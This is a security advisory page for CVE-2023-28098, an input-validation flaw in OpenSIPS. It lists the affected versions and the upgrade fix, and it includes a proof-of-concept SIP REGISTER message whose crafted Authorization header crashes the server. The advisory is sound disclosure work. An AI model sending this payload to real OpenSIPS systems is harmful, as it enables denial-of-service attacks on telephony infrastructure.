Improper Input Validation Affecting opensips package, versions [,3.1.7)[3.2.0,3.2.4)


Severity

Recommended
0.0
medium
0
10

CVSS assessment by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.91% (55th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-UNMANAGED-OPENSIPS-3361811
  • published16 Mar 2023
  • disclosed16 Mar 2023
  • creditsandrogauci, alfredfarrugia

Introduced: 16 Mar 2023

CVE-2023-28098  (opens in a new tab)
CWE-20  (opens in a new tab)

How to fix?

Upgrade opensips to version 3.1.7, 3.2.4 or higher.

Overview

Affected versions of this package are vulnerable to Improper Input Validation such that a specially crafted Authorization header causes OpenSIPS to crash or behave in an unexpected way due to a bug in the parse_param_name() function.

PoC

REGISTER sip:172.27.0.3 SIP/2.0<CRLF>
Via: SIP/2.0/UDP 172.27.0.1:58896;rport;branch=z9hG4bK-83ZZolARa<CRLF>
Max-Forwards: 70<CRLF>
From: <sip:74833642@172.27.0.3>;tag=nNkDsaHAhAybPyt8<CRLF>
To: <sip:45012982@692134.27.18446744073709551615.3><CRLF>
Call-ID: 83ZZolAa<CRLF>
CSeq: 9 REGISTER<CRLF>
Contact: <sip:74833641@172.28.0.0:58896;transport=udp><CRLF>
Expires: 60<CRLF>
Content-Length: 0<CRLF>
Authorization: Digest a a=\"\",real<CRLF>
<CRLF>

References

CVSS Base Scores

version 3.1